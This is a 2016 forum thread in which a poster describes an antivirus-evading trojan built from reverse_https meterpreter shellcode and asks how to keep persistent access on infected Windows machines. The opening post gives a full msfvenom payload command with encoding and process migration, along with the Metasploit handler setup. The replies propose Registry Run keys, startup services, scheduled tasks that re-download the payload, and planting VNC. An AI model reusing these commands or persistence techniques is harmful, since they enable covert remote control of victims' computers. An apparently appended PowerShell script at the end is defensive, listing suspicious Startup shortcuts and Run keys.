Oxidizer Posted January 9, 2016

So I've created an .exe using reverse_https meterpreter shellcode and it's undetectable. However, all of meterpreter's persistence methods resulted in the AV going off, so I decided to use NSIS to make an installer for my trojan. This does get detected by a few AVs, but it's as close to undetectable as I could get and still have persistence. It copies the .exe somewhere else and creates a shortcut in the user's startup folder so that the .exe is run upon sign-in.

However, meterpreter does not start a new session when the session is lost, and upon sign-in, nothing happens. The old session is still open, but unresponsive. I know that the .exe is run upon log-in because when I manually close the session, and then listen, it will pick up a new session.

How do I maintain access by using the shortcut method? Also, is there a better way to maintain persistence without NSIS? Using NSIS seems silly. I want the .exe to immediately have persistence without connecting back and then having metasploit tell it to do something.

Here is the shellcode that I'm using:

    msfvenom -p windows/meterpreter/reverse_https lhost=xxxx lport=xxxx PrepenMigrate=true PrependMigrateProc=svhost.exe -b '\x00\xff' -e x86/shikata_ga_nai -i 3 -f c

This is what I type when I start metasploit on Kali:

    use exploit/multi/handler
    set payload windows/meterpreter/reverse_https
    set SessionCommunicationTimeout 0
    exploit
i8igmac Posted January 9, 2016

I'm not so sure NSIS is necessary... you can use the meterpreter to upload files or write files to the destination folder... place a meterpreter in the startup folder...

You can use rc scripts with the exploit handler to automate meterpreter commands. When a shell is first established this rc script would execute...

From the meterpreter shell, have you tried to modify the registry? Attempt to make a startup service... will this set off the AV? You have to keep trying new things, and take note of what works...
vailixi Posted January 10, 2016

Scheduled tasks, environment variables, aliases. You can always write a scheduled task to check if your payload is running; if not, start it, stop it, delete it, download and install a new version of the payload. Maybe install a legitimate remote access tool on the machine. VNC or whatever.
M1k3 Posted January 27, 2016

Totally agree with i8igmac. Change the registry if you want to maintain persistence. I also don't think that venom is the best solution because it is fully detectable.
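The persistence locations named across this thread (a shortcut in the Startup folder in the first post, the Run registry keys in the later replies) are exactly the places a defender audits. The following PowerShell script is added here as an example and is not code from any poster: it lists Startup-folder shortcuts and Run/RunOnce values whose launch target sits outside Program Files or the Windows directory, which is where an .exe that has been "copied somewhere else" would show up. The trusted-root list is an assumption to tune for the host.

```powershell
# Added example (not from the thread): list Startup-folder shortcuts and
# Run/RunOnce values whose launch target lives outside the usual program
# directories. The trusted-root list is an assumption; tune it per host.
$trustedRoots = @($env:ProgramFiles, ${env:ProgramFiles(x86)}, $env:SystemRoot) | Where-Object { $_ }

function Test-TrustedPath {
    param([string]$Path)
    if (-not $Path) { return $false }
    # Keep only the executable: strip surrounding quotes and trailing arguments.
    $exe = ($Path -replace '^"([^"]+)".*$', '$1') -replace '^(\S+\.exe)\b.*$', '$1'
    foreach ($root in $trustedRoots) {
        if ($exe.StartsWith($root, [System.StringComparison]::OrdinalIgnoreCase)) { return $true }
    }
    return $false
}

$findings = @()

# 1. Shortcuts in the per-user and all-users Startup folders.
$shell = New-Object -ComObject WScript.Shell
$startupDirs = @([Environment]::GetFolderPath('Startup'), [Environment]::GetFolderPath('CommonStartup'))
foreach ($dir in $startupDirs) {
    foreach ($file in (Get-ChildItem -Path $dir -Filter *.lnk -ErrorAction SilentlyContinue)) {
        $lnk = $shell.CreateShortcut($file.FullName)
        if (-not (Test-TrustedPath $lnk.TargetPath)) {
            $findings += [pscustomobject]@{ Source = $file.FullName; Target = $lnk.TargetPath; Args = $lnk.Arguments }
        }
    }
}

# 2. Run / RunOnce values for the current user and the machine.
$runKeys = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
)
foreach ($key in $runKeys) {
    $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
    if (-not $props) { continue }
    foreach ($p in $props.PSObject.Properties) {
        if ($p.Name -like 'PS*') { continue }   # provider metadata, not a Run value
        if (-not (Test-TrustedPath $p.Value)) {
            $findings += [pscustomobject]@{ Source = "$key\$($p.Name)"; Target = $p.Value; Args = '' }
        }
    }
}

$findings | Format-Table -AutoSize
```

Scheduled tasks, the third location mentioned in the thread, can be reviewed the same way with Get-ScheduledTask and the Actions property of each task.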